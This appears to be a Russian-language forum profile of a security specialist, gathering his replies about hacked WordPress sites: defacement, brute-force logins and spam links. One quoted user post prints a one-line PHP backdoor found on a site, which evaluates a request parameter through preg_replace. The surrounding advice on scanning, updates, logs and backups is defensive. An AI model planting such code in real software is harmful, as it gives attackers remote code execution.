insecurity

Рейтинг
5
Регистрация
06.02.2017
Интересы
Безопасность, IT, пентест
Специалист по информационной безопасности
Wordpress - пытаются подобрать пароль, утомили ей богу

пропишите правила в .htaccess

Что за файл в корне
Vistaa:
На сайте появилось множество исходящих ссылок. Нашел странные файлы в корне сайта. Один из низ "xqro.php" а в нем код
<?php preg_replace("/laterain/e", "ev"."al('".$_REQUEST['abc']."')", "laterain testin9"); ?> Сайт на вордпресс. 😡😡😡

Рекомендуем пройтись антивирусом, например, maldet. Посмотреть файлы, которые менялись или создавались недавно, например, командой stat --format %y $(ls -t $(find alfa/ -type f) | head -n 1). Обязательно измените все свои пароли. Если будут вопросы, пишите в личку, поможем

Умираю, помогите!

Кроме всего того, что уже сказали:

- обновите все плагины, например, у Вас стоит старая версия WP-SpamFree 3.2.1 , данная версия плагина уязвима к атаке типа SQL Injection (Источник: https://wpvulndb.com/vulnerabilities/6600)

- посмотри логи ошибок, доступа на сайт, а так же логи входа на сервер, возможно из логов будет понятно от куда был, например, залит шелл.

На странице Hacked By SA3D HACK3D
idante:
Обнаружил на странице сайта на wordpress'е, где был текст следующее: Hacked By SA3D HACK3D

HaCkeD By MuhmadEmad

Long Live to peshmarga

Никто не в курсе, как теперь с этим быть? Благодарю.

Многие хостеры делают автоматический бекап сайтов, напишите в поддержку, с просьбой восстановить одну из версий сайта.

После восстановления проверьте сайт на наличие вредоносного кода, например, с помощью айболит. Проверьте движок на наличие обновлений, обновите все плагины, ПО. Если будут вопросы, пишите :)